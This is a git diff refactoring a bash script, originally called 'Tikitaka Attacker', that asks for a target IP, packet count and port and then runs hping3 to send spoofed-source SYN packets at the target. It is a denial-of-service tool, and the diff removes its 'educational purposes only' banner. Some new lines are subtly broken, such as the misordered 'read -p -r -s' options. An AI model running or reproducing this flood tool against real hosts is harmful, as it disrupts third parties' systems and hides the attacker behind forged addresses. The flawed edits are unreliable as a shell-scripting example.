Refactor Tikitaka script for improved readability

diff --git a/tikitaka b/tikitaka
--- a/tikitaka
+++ b/tikitaka
@@ -1,28 +1,31 @@
 #!/bin/bash
 
+RED='\033[31m'
+GREEN='\033[32m'
+BLUE='\033[34m'
+NC='\033[0m'
+
+
+echo "\n"
+figlet -f mini "Itaka, Alahmedi 2025, Mohammed Mahmoud 2025"
 echo
-echo " ------------------------------------------------------------------------------"
-echo "|                                                                              |"
-echo "|   Tikitaka Attacker V1.2, Khalifa Alahmedi 2025                              |"
-echo "|   ONLY use for educational purposes. I am NOT responsible for any misuse.    |"
-echo "|                                                                              |"
-echo " ------------------------------------------------------------------------------" 
-echo
-read -p "[tikitaka] IP address: " ip
-read -p "[tikitaka] Amount of packets: " pac
-read -p "[tikitaka] Port: " port
+read -p -r -s "[itaka] IP address: " ip
+read -p "[itaka] Amount of packets: " pac
+read -p "[itaka] Port: " port
 
 if [[ "$ip" == "" ]]; then
-	echo "[tikitaka] ERROR: IP not specified, cannot proceed"
+	echo -e "${RED} [itaka] ERROR: IP not specified, cannot proceed ${NC}"  >&2
+	exit 1
 else
 	if [[ "$pac" == "" ]]; then
-		echo "[tikitaka] ERROR: Packet amount not specified, cannot proceed"
+		echo -e "${RED} [itaka] ERROR: Packet amount not specified, cannot proceed ${NC}" >&2
+		exit 1
 	else
 		if [[ "$port" == "" ]]; then
-			echo "[tikitaka] WARNING: Port not specified, using default"
-			sudo hping3 -c $pac -d 64 -S --flood --rand-source $ip
+			echo -e "${BLUE} [itaka] WARNING: Port not specified, using default ${NC}"
+			sudo hping3 -c $pac -d 64 -S --rand-source $ip
 		else
-			sudo hping3 -c $pac -d 64 -S -p $port --flood --rand-source $ip
+			sudo hping3 -c $pac -d 64 -S -p $port --rand-source $ip
 		fi
 	fi
 fi
